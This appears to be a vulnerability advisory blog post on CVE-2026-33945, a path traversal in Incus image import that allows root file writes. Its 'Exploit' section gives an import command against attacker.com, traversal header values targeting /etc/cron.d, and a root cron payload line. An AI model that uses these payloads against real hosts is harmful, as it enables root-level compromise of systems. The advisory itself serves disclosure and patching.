Incus, Path Traversal in Image Import leading to Arbitrary File Write, CVE-2026-33945 (Critical) -DC-Jun2026-686

By /

Listen to this Post

How the mentioned CVE works

The vulnerability resides in the image import functionality of the Incus daemon (incusd) when handling images from a URL (source.type=url).

The flaw is triggered in the following sequence:

  1. When a user initiates an image import from a URL, the daemon makes an initial `HEAD` request to the user-supplied URL to gather image metadata.
  2. The malicious server responds with two critical headers: `Incus-Image-Hash` and Incus-Image-URL.
  3. The `Incus-Image-Hash` value is taken directly from the attacker’s response and passed as the `Alias` parameter to the `imageDownload()` function.
  4. This attacker-controlled `Alias` string is then used as the filename (fp) for the downloaded image.
  5. The daemon constructs the final file path using `filepath.Join(destDir, fp)` without any sanitization. This allows a path traversal payload (e.g., ../../../../etc/cron.d/payload) in the `Incus-Image-Hash` header to escape the intended image storage directory.
  6. The daemon then proceeds to the `direct` protocol branch, where it opens this crafted path with `os.Create()` and streams the HTTP response body from the `Incus-Image-URL` into the file.
  7. Critically, the SHA-256 hash validation of the downloaded file occurs after the file has already been created and populated. This validation is ineffective for preventing the write.
  8. The cleanup routine, which would delete the file on failure, only runs after the HTTP response copy is complete. By keeping the response connection open for an extended period (e.g., 90 seconds), the attacker can ensure the malicious file persists on the system.
    This sequence of events allows an attacker to write arbitrary content to any location on the host filesystem with root privileges.

DailyCVE Form

Platform: Incus
Version: <6.23.0
Vulnerability: Path Traversal
Severity: Critical
date: 2026-03-26

Prediction: 2026-04-15

What Undercode Say

Analytics:

The vulnerability is a classic case of improper input validation leading to path traversal (CWE-22). The root cause is the trust placed in attacker-controlled HTTP headers (Incus-Image-Hash) before validation. The design flaw is the “validate after write” pattern, which provides a window for exploitation. The use of a slowloris-style attack to prolong the file’s existence on disk is a novel and effective technique to bypass the cleanup mechanism.

Bash commands and codes related to the blog

To check your Incus version:

incus --version

To trigger the vulnerability (assuming a malicious server is running):

incus image import http://attacker.com/stage --alias my-image

A snippet of the vulnerable code path in cmd/incusd/images.go:

// cmd/incusd/images.go - The HEAD request is made before validation
head, err := http.NewRequest("HEAD", req.Source.URL, nil)
// ...
hash := raw.Header.Get("Incus-Image-Hash")
// ...
info, _, err := ImageDownload(ctx, r, s, op, &ImageDownloadArgs{
Server: url,
Protocol: "direct",
Alias: hash, // <-- Attacker-controlled value used as filename
// ...
})

Exploit

A working proof-of-concept involves setting up a malicious HTTP server that responds to the `HEAD` request with a traversal payload in the `Incus-Image-Hash` header and serves the malicious payload in the subsequent `GET` request. The server then holds the connection open to prevent immediate cleanup.

Example malicious server response headers:

Incus-Image-Hash: ../../../../etc/cron.d/incus-rce
Incus-Image-URL: http://attacker.com/payload

The `payload` served by the server would contain a cron job definition, such as:

root /bin/sh -c 'id > /tmp/incus_rce'

By importing an image from this server, the attacker writes a cron job to the host, leading to arbitrary command execution as root.

Protection

  • Upgrade: The primary and most effective mitigation is to upgrade Incus to version 6.23.0 or later, which patches this vulnerability.
  • Network Restrictions: Implement strict firewall rules to prevent the Incus server from making outbound HTTP requests to untrusted or arbitrary networks. This limits the attack surface by restricting the servers from which images can be imported.
  • Project Restrictions: Utilize Incus project restrictions, such as restricted.images.servers, to limit the image sources that users can use, although note that this alone was shown to be insufficient for the HEAD request part of the attack.

Impact

  • Arbitrary File Write: An attacker can write files to any location on the host filesystem with root privileges.
  • Privilege Escalation: By writing to sensitive system files (e.g., cron jobs, /etc/passwd, SSH keys, or core_pattern), an attacker can achieve full privilege escalation to root.
  • Denial of Service: Overwriting critical system files can render the host system inoperable.
  • Command Execution: The ability to write arbitrary files as root directly translates to the ability to execute arbitrary commands on the host, leading to a complete system compromise.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top